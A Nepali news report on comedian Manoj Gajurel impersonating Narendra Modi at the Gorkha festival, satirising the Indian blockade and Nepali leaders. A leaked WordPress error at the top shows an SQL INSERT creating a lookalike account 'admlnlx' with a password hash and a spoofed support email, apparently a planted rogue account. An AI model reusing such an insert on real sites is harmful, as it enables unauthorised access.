WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjGsMMrwrVjLqf746Rczjs2fbqrPrl.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-02 02:52:04', '', 'admlnlx', 'admlnlx')
गोरखा, पुस ११ –
गोरखा महोत्सवको मञ्चमा एकाएक नरेन्द्र मोदी देखिए । अमस्मात मोदीको आगमनले दर्शक केहीबेर अक्क न वक्क परे ।
मोदी हिन्दीमा बोल्न थाले । ‘कल मैने प्रचण्डजीको भेजा था । मित्रों, आरोप है कि मोदीजी नेपालके विरोधमे है । लेकिन मित्रों, नेपालके सबसे अच्छा चिज मुझे आपका भात लगरहा है । मै आप के सामने माफी माग्ने आया हुँ ।’
उनले आफूलाई गोरखाको भात सबैभन्दा मीठो लागेको सुनाए । ‘गोरखाका भात सब से अच्छा था, नेपालका दालभातका पावर, ट्वान्टीफोर आवर’, उनले भने । तर, ती व्यक्ति वास्तविक मोदी थिएनन्, मोदीको भेषमा थिए चर्चित कलाकार मनोज गजुरेल ।
गजुरेल व्यंग्य गर्दै गए, ‘मित्रों, हिन्दूस्तान ने नेपालको नाकाबन्दी लगा के दुःख दिया यी बात गलत है । हिन्दूस्तान से नाकाबन्दी कभी नहीं लगा था । हमने औषधि रोका था, आलु नहीं रोका था । ग्यास रोका था, लेकिन मधेस मे क्यास नही रोका था । पेट्रोल रोका था, केरा नहीं रोका था ।’
यति सुनेपछि दर्शक गलल्ल हाँसेका थिए । मोदी बनेका गजुरेलले नेपालका राजनीतिक दलका नेताप्रति तीखो व्यंग्य गरे । नेताहरु बिहान रामदेवको पछि, दिनमा बामदेवको पछि, साँझमा झ्वामदेवको पछि र रातमा कामदेवको पछि लागेकाले नेपाल बिग्रेको टिप्पणी गरे ।